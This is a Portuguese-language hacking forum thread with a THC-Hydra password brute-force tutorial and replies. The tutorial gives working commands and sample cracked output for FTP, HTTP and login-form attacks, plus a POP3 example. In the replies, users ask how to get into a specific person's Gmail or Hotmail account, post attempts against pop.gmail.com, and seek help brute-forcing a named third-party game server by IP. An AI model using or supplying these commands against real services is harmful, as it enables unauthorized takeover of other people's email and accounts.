Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

THC-Hydra

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial THC-Hydra

    vamos lah

    O THC-Hydra usa um mecanismo de força bruta para quebrar senhas.
    FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
    Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de senhas e nomes de usuários ate chegar ao seu objetivo obvio.

    O programa pode ser adquirido gratuitamente no site oficial do projeto : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...



    [0x00] Rodando o THC-Hydra no (Windows XP):



    O primeiro passo é fazer o download da versão Win32/Cywin do programa no site oficial,descompactar e rodar.

    Crie uma variável de ambiente indo em painel de controle>sistema, aba avançado,variáveis de ambiente e adicionando o caminho na variável path.



    ex: C:\hydra-5.4-win;
    não esqueça de adicionar ; ponto virgula no final do caminho,assim o windows vai conseguir diferenciar o caminho do hydra dos demais adicionados.



    [0x01]
    Executando o Hydra:


    Rode o comando hydra no prompt de comandos para chamar o programa thc-hydra.



    Podemos ver na imagem acima que quando executado exibe informações como versão,sintaxe de uso e as opções seguidas de comentários.

    [0x02] Opções:


    -R Restaura sessões abordadas/quebradas.
    -S Estabelece conexões seguras usando SSL.
    -s Identifica qual porta o hydra vai estabelecer a conexão.
    Uso: -s 110.
    -l Especifica o nome da vitima. uso: -l fulano.
    -L Carrega uma lista contendo nomes de vitimas.
    uso: -L users.txt
    -p Usa senha única. uso: -s 123456
    -P Carrega uma lista de senhas. uso: -S senhas.txt
    -e Usado junto com 's' testa se o usuário usa seu user como senha//acompanhado da letra 'n' testa uma senha em branco.
    -C Usado para carregar um arquivo contendo usuário/senha. formato fulano:123456, seria o mesmo que -L/-P . uso: -C user-pass.txt
    -M Carrega uma lista de servidores. uso: -M server.txt
    -o Salvar os resultados obtidos dentro de um arquivo.Uso: -o saida.txt
    -f Faz o programa parar de trabalhar quando a senha é encontrada.
    -t Limita uma certa quantidade de solicitações por vez,assim evita do programa se engasgar com demasiadas solicitacões.
    -w Usado para definir o tempo máximo em segundos para esperar resposta do servidor.
    -v / V Chama o modo verbose do programa.
    A adicional 'V' é usada para mostrar todas as tentativas. Uso: -vV /ou 'v' para o modo verbose sem exibir as tentativas mau sucedidas.

    Server: Servidor.
    exemplos>>

    .127.0.0.1
    .localhost
    .pop.gmail.com
    .pop.mail.yahoo.com.br
    .pop3.live.com
    .ftp.lol.com.br


    Service: protocolo||serviço que sera usado||chamado.
    exemplos>>

    .pop3
    .ftp
    .smtp
    .vnc
    .imap
    .http-head
    .http-post-form

    CALMA, o tutorial ja ta acabando

    Agora tem alguns exemplos:

    Exemplo 1 FTP


    hydra -l root -P pass.txt -s 21 localhost ftp
    Retorno:



    Vamos em partes e explicaremos as informações de saída que o hydra retornou.

    16 tasks, > É o numero de solicitacões que o Hydra esta fazendo ao nosso alvo. Estas 16 solicitações por vez é 'PADRÃO/DEFALT' do Hydra e pode ser mudado usando a opção -t [n-solicitações]

    1 servers, > Estarei fazendo solicitacões para a obtenção das senhas em um único servidor.

    23 login tries (l:1/p:23), ~1 tries per task, > Esta saída esta mostrando a quantidade de senhas que estão inseridas no aquivo pass.txt.

    [DATA] attacking service ftp on port 21 > Indica que o ataque já foi iniciado em um serviço FTP na porta 21.

    [21][ftp] host: 127.0.0.1 login: root password: chaw123 > Esta saída mostra que foi encontrado a senha chaw123 pertencente ao usuário root.

    [STATUS] attack finished for localhost (waiting for childs to finish) > Esta mensagem indica que o ataque foi finalizado.
    Exemplo 2 http-head


    hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
    Retorno:



    O Hydra encontrou usuario:root/senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'

    Dentro do arquivo foi escrito as seguintes linhas pelo programa:
    # Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P pass.txt -o saida.txt localhost http-head)
    [80][www] host: 127.0.0.1 login: root password: Est2yu

    /xammp/ é o caminho/path >> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Exemplo 3 http-post-form


    hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalid o</title>"
    Retorno:



    >> Para criar esta sintaxe tive que olhar o código da pagina.

    <form action="index.php" method="POST">
    <input type="text" name="nome" /><BR><br>
    <input type="password" name="senha" /><br><br>
    <input type="submit" name="boo" value="Enviar">
    <br>
    </form>
    De cara sei como sera feito o envio >>
    index.php?nome=meunome&senha=minhasenha&boo=Enviar
    –- usando o 'method=post' para envio –-

    no meu caso quando envio senha errada,no título da pagina 'index.php' aparece a mensagem invalido.
    invalido

    hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalid o</title>"
    sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.

    Exemplo 4 POP3


    hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
    Retorno:




    FIM \o/

    Creditos: Mdh3ll & H4ck3r.5m0g

    Nos desculpem pelos errinhos de portugues :s

    OBS: Se você nao entendeu algum processo, revise a parte de executar e de Opções desse tutorial

    Caso ainda assim nao tenha entendido, me add no msn que eu explico direitinho

    godinho.feliz@hotmail.com
    Similar Threads

  • Font Size
    #2
    otimo post vlw
    -------------------------------------------------------------------------------------------






    Comment


    • Font Size
      #3
      Belo tópico cara, obrigado !

      Flw.



      areax@hotmail.com



      Comment


      • Font Size
        #4
        Mt Bom!
        Parabens!

        Comment


        • Font Size
          #5
          Caramba show de bola,,,
          uma pergunta,,, para usar o arquivo de user.txt e senha.txt,,, tipo,, criar dicionários,,

          para o pop3 ficaria assim
          hydra -L users.txt -p 123456 -S pop3.gmail.com pop3

          eu crio esse arquivo *.txt,,,, como a ID da pessoa a qual quero saber a senha do email,,, ou já posso colocar o nome "ID" direto na linha de comando,,,

          sobre o arquivo da senha,, eu posso gerar uma wordlist, mais como usar esta wordlist,,,

          coloco esse arquivo dentro da pasta onde está o hydra?

          fico no aguardo,, e muitos agradecientos pelo execlente post,,


          segue aí um complemento ao Hydra
          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...




          valeu,,,,
          Last edited by praTes; 29-07-2010, 18:29.

          Comment


          • Font Size
            #6
            eu estava procurando isso faz tempo. vlw

            Comment


            • Font Size
              #7
              Sou um tanto leigo no assunto, entao gostaria de saber qual eh comando recomendado dentre os exemplos acima (ftp, http, pop) para descobrir a senha de um usuario do gmail ou hotmail.

              Grato.

              Comment


              • Font Size
                #8
                Use o protocolo Pop.

                Flw.



                areax@hotmail.com



                Comment


                • Font Size
                  #9
                  Postado Originalmente por areax Ver Post
                  Use o protocolo Pop.

                  Flw.
                  Prezado, tentei os seguintes comandos (removi apenas o "3" no segundo) com seus respectivos resultados:

                  hydra -l usuariologin -P wordlist.txt -S pop3.gmail.com pop3

                  Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
                  Hydra (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...) starting at 2010-07-19 13:43:59
                  [DATA] 16 tasks, 1 servers, 94 login tries (l:1/p:94), ~5 tries per task
                  [DATA] attacking service pop3 on port 995
                  Error: Can not resolve pop3.gmail.com
                  Error: No server to scan!


                  hydra -l usuariologin -P wordlist.txt -S pop.gmail.com pop3

                  Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
                  Hydra (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...) starting at 2010-07-19 13:46:45
                  [DATA] 16 tasks, 1 servers, 94 login tries (l:1/p:94), ~5 tries per task
                  [DATA] attacking service pop3 on port 995
                  Error: POP3 protocol error or service shutdown: -ERR malformed command q42pf7909
                  933ybk.16

                  Error: POP3 protocol error or service shutdown: -ERR malformed command 4pf192655
                  58ani.12

                  Error: POP3 protocol error or service shutdown: -ERR malformed command l19pf1173
                  0479ybn.24
                  Q☺
                  Error: POP3 protocol error or service shutdown: -ERR malformed command 4pf192468
                  26ani.36

                  Error: POP3 protocol error or service shutdown: -ERR malformed command u1pf12382
                  39ybh.25

                  Error: POP3 protocol error or service shutdown: -ERR malformed command t1pf19265
                  098ano.10

                  Error: POP3 protocol error or service shutdown: -ERR malformed command j2pf79046
                  71ybe.36
                  Error: POP3 protocol error or service shutdown: -ERR malformed command x22pf1172
                  0671ybd.44

                  Q☺
                  Error: POP3 protocol error or service shutdown: -ERR malformed command c5pf79171
                  29ybi.4Error: POP3 protocol error or service shutdown: -ERR malformed command 6p
                  Error: POP3 protocol error or service shutdown: -ERR malformed command x16pf1925
                  8744anx.21


                  Q☺
                  Error: POP3 protocol error or service shutdown: -ERR malformed command h18pf1173
                  2100yba.17Error: POP3 protocol error or service shutdown: -ERR malformed command
                  m19pf19250067anf.31Error: POP3 protocol error or service shutdown: -ERR malform
                  ed command r9pf7905376yba.39
                  Q☺Q☺

                  Error: POP3 protocol error or service shutdown: -ERR malformed command x1pf19237
                  537anb.47

                  [STATUS] attack finished for pop.gmail.com (waiting for childs to finish)
                  Hydra (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...) finished at 2010-07-19 13:46:52

                  .
                  .
                  .

                  O que fiz de errado?!

                  Comment


                  • Font Size
                    #10
                    Cara, parece que o próprio servidor que bloquiou o ataque mesmo.
                    Cara quebrar uma senha de email n é tão simples assim precisa de um sistema mais organizado, etc.

                    Flw.



                    areax@hotmail.com



                    Comment


                    • Font Size
                      #11
                      gostaria que alguem me ajuda-se.
                      É o seguinte estou tentando rodar um force brute com o hydra em um server de mu online, ja tentei de varias maneiras e não consegui, tentei no site e não deu tentei direto no servidor do jogo e tb não consegui.
                      o site eh o seguinte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., acho que é pq esta em java e tentei fazer um form mais não deu.
                      Tambem tentei direto no servidor do jogo que são um dos 2 ip: 187.115.205.133:55500
                      187.115.205.133:55908
                      Ve se isso serve pra ajuda;
                      Com o programa bruter, consegui uma resposta com protocolo PgSql, deu uma resposta com o nome do servidor e tudo soh que uma resposta de erro = "Unexcepted response: 1.2.554.a::MuHellFire::1.21.a."
                      So que nem testo as senhas.
                      Ai nao sei se tem q cria um protocolo para o hydra, queria uma ajuda ai se possivel.
                      To no Aguardo!

                      Comment


                      • Font Size
                        #12
                        Cara
                        Fui atraido por você
                        Tava loco desesperado procurando algo assim
                        Vou colocar em pratica a campanha do Use o obrigado!
                        Man
                        Vou visitar o guiadohacker para sempre agora =)!

                        Comment


                        • Font Size
                          #13
                          olá pessoal...estou precisando de ajuda..e o seguinte fiz todos os procedimentos para rodar no xp......só que quando eu vou executar naum roda.aparece a seguinte msg < hydra não é reconhecido como um comando interno ou externo, um programa operavel ou um arquivo em lote> desculpem a ignorancia......rsrs

                          Comment


                          • Font Size
                            #14
                            Muito obrigado belo topico

                            Comment


                            • Font Size
                              #15
                              Alguem poderia me ajudar a instalar no Win7?
                              Last Job



                              Comment

                              X
                              Working...
                              X